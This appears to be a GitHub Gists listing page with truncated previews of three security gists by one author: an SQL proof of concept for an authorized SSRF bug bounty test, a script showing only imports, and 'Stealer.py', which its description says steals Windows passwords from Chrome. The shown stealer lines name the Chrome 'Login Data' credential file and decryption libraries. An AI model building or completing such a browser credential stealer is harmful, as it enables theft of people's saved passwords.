This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- SSRF PoC: Arbitrary SQL Execution via Database Import | |
| -- BugHunter Security Assessment - Authorized Bug Bounty Testing | |
| -- Target: Yalla Super Mall (Sandbox) - Pantheon Bugcrowd Program | |
| -- Tester: secfathy | |
| -- Date: 2026-04-19 | |
| -- Marker table to prove SQL execution without destructive impact | |
| CREATE TABLE IF NOT EXISTS ssrf_poc_evidence ( | |
| id INT AUTO_INCREMENT PRIMARY KEY, | |
| marker VARCHAR(255), |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import warnings | |
| from urllib3.exceptions import NotOpenSSLWarning | |
| warnings.filterwarnings("ignore", category=NotOpenSSLWarning) | |
| import subprocess | |
| import requests | |
| import urllib.parse | |
| import json | |
| import os | |
| from datetime import datetime |
SecFathy
/ Stealer.py
Created
March 18, 2025 18:37
Steal a Windows Passwords From Google Chrome Browser Database
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sqlite3 | |
| import json | |
| import base64 | |
| import shutil | |
| import win32crypt | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.backends import default_backend | |
| CHROME_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data" |